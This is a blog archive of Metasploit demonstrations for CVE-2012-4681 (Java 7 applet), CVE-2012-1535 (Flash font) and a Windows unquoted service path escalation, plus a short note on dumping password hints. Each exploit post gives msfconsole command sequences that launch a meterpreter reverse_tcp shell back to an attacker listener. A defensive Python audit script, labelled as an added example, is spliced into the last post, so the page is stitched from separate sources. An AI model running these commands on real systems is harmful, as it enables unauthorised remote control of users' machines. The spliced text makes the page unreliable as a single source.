Category Archives: Metasploit

All my posts regarding Metasploit framework, auxiliaries, plugins and exploits.

Java 7 Applet RCE 0day Gondvv CVE-2012-4681 Metasploit Demo

Timeline :

Vulnerability reported to ZDI by James Forshaw (tyranid)
Vulnerability reported to the vendor by ZDI on 2012-07-24.
Vulnerability found exploited in the wild and discovered by Michael Schierl
First public details of the vulnerability on 2012-08-26
Source code of the vulnerability provided by jduck on 2012-08-26
Metasploit PoC provided on 2012-08-27
Patched through an out-of-band Oracle Security Alert for CVE-2012-4681 on 2012-08-30.

PoC provided by :

Unknown
jduck
sinn3r
juan vazquez

Reference(s) :

CVE-2012-4681
OSVDB-84867
BID-55213
Zero-Day Season is Not Over Yet
Java 7 0-Day vulnerability information and mitigation
ZDI-12-197
Oracle Security Alert for CVE-2012-4681

Affected version(s) :

Oracle JSE (Java Standard Edition) version 1.7.0_06-b24 and earlier.

Tested on Windows XP Pro SP3 & Ubuntu 12.04 with :

Internet Explorer 8 & Firefox 14.0.1 & Chrome
Oracle JSE 1.7.0_06-b24

Description :

This module exploits a vulnerability in Java 7 which allows an attacker to run arbitrary Java code outside the sandbox. This flaw is also being exploited in the wild, and there is no patch from Oracle at this point. The exploit has been tested to work against IE, Chrome and Firefox across different platforms.

Commands :

use exploit/multi/browser/java_jre17_exec
set SRVHOST 192.168.178.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid

Windows 0day exploitation with Internet Explorer, Firefox and Chrome :

Linux Ubuntu 12.04 exploitation with Firefox :

Metasploit Windows User Password Hints Decode Auxiliary Modules

Metasploit provides some Microsoft Windows auxiliary modules that let you dump local accounts from the SAM database. These modules, “post/windows/gather/hashdump” and “post/windows/gather/smart_hashdump”, have recently been updated to also collect Windows user password hints. A nice blog post, “All Your Password Hints Are Belong to Us” by claudijd, explains how they successfully extracted and decoded user password hints from the Windows registry. Below is a small video demonstration of these modifications.

Nice job from @claudijd, @reynoldsrb, @_sinn3r and @TheLightCosine for these nice upgrades 🙂

CVE-2012-1535 Adobe Flash Player Vulnerability Metasploit Demo

Timeline :

Vulnerability found exploited in the wild and reported by Alexander Gavrun
Vulnerability reported by the vendor on 2012-08-14
Metasploit PoC provided on 2012-08-17

PoC provided by :

Alexander Gavrun
juan vazquez
sinn3r

Reference(s) :

APSB12-18
CVE-2012-1535
OSVDB-84607
BID-55009

Affected version(s) :

Adobe Flash Player 11.3.300.270 and earlier versions for Windows and Macintosh
Adobe Flash Player 11.2.202.236 and earlier versions for Linux
Flash Player installed with Google Chrome, versions earlier than 21.0.1180.79.

Tested on Windows 7 Integral with :

Internet Explorer 9
Adobe Flash Player 11.3.300.268

Description :

This module exploits a vulnerability found in the ActiveX component of Adobe Flash Player before 11.3.300.271. By supplying a corrupt font file used by the SWF, it is possible to gain arbitrary remote code execution in the context of the user, as exploited in the wild.

Commands :

use exploit/windows/browser/adobe_flash_otf_font
set SRVHOST 192.168.178.100
set ROP JRE
set TARGET 6
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid

Windows Service Trusted Path Privilege Escalation Vulnerability Metasploit Demo

Timeline :

Metasploit PoC provided on 2012-08-14

PoC provided by :

sinn3r

Reference(s) :

None

Affected version(s) :

All Microsoft Windows versions, with applications having unexpected paths

Tested on Windows XP Pro SP3 with :

OpenVPN 2.1.1

Description :

This module exploits a logic flaw due to how the lpApplicationName parameter is handled. When lpApplicationName contains a space, the file name is ambiguous. Take this file path as an example: C:\program files\hello.exe. The Windows API will try to interpret this as two possible paths, C:\program.exe and C:\program files\hello.exe, and then try to execute them in that order. To some software developers this is unexpected behavior, which becomes a security problem if an attacker is able to place a malicious executable in one of these unexpected paths, sometimes escalating privileges if the program runs as SYSTEM. Some software such as OpenVPN 2.1.1, OpenSSH Server 5, and others have the same problem. The offensive technique is also described in Writing Secure Code (2nd Edition), Chapter 23, in the section “Calling Processes Security” on page 676.
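The ambiguity described above can be audited without any exploitation: for each service ImagePath, enumerate the prefixes Windows would try before reaching the intended binary, and quote the executable part so only one path remains. The following is an added example, not the Metasploit module's code; the service names and ImagePath values are constructed samples (on a real host they come from HKLM\SYSTEM\CurrentControlSet\Services\<name>\ImagePath, or from `sc qc <name>`), and the hypothetical helpers `candidate_paths`, `quote_image_path` and `audit` are mine. It generalizes the page's two-path case to any number of spaces, including command-line arguments after the executable.

```python
"""Audit Windows service ImagePath values for unquoted paths containing spaces.

Added example (not from the original post or from Metasploit). The sample
ImagePath values below are constructed for illustration.
"""

# Constructed sample of service name -> ImagePath, as read from the registry.
SAMPLE_SERVICES = {
    "OpenVPNService": r"C:\Program Files\OpenVPN\bin\openvpnserv.exe",
    "GoodService": r'"C:\Program Files\Good Vendor\svc.exe" -k net',
    "Spooler": r"C:\Windows\System32\spoolsv.exe",
    "SvcArgs": r"C:\Program Files\Foo Bar\agent.exe --service",
}


def candidate_paths(image_path):
    """Return the executables CreateProcess may try, in the order it tries them.

    A quoted path yields exactly one candidate. For an unquoted path, every
    space-delimited prefix up to the first one ending in .exe is a candidate;
    CreateProcess appends .exe to a candidate that has no extension, which is
    why "C:\\program files\\hello.exe" first resolves to "C:\\program.exe".
    """
    s = image_path.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return [s[1:end] if end > 0 else s[1:]]
    cands = []
    pos = 0
    while True:
        nxt = s.find(" ", pos)
        prefix = s if nxt == -1 else s[:nxt]
        basename = prefix.rsplit("\\", 1)[-1]
        cands.append(prefix if "." in basename else prefix + ".exe")
        if nxt == -1 or prefix.lower().endswith(".exe"):
            return cands
        pos = nxt + 1


def quote_image_path(image_path):
    """Remediation: wrap the executable part in quotes, leaving arguments alone."""
    s = image_path.strip()
    cands = candidate_paths(s)
    if s.startswith('"') or len(cands) == 1:
        return s
    exe = cands[-1]
    # Only rewrite when the final candidate is literally present in the string
    # (i.e. no .exe was appended by us); otherwise leave it for a human to fix.
    if not s.lower().startswith(exe.lower()):
        return s
    return '"' + exe + '"' + s[len(exe):]


def audit(services):
    """Map each vulnerable service to the ambiguous paths a defender should check
    for write permissions, plus the quoted ImagePath that removes the ambiguity."""
    findings = {}
    for name, path in services.items():
        cands = candidate_paths(path)
        if len(cands) > 1:
            findings[name] = {
                "ambiguous_paths": cands[:-1],
                "fix": quote_image_path(path),
            }
    return findings


if __name__ == "__main__":
    for svc, info in audit(SAMPLE_SERVICES).items():
        print(svc)
        for p in info["ambiguous_paths"]:
            print("  would be tried first:", p)
        print("  quoted ImagePath     :", info["fix"])
```

Services whose executable sits under a space-containing directory that non-administrators can write to are the ones worth fixing first; the quoted value returned by `quote_image_path` is what the service's ImagePath should be set to.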

Commands :

You need a valid session on the target, obtained for example with :

exploit/windows/browser/ms12_037_same_id

Then execute the following exploit module to detect vulnerable services :

use exploit/windows/local/trusted_service_path
set SESSION 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
set LPORT 4443
exploit

sysinfo
getuid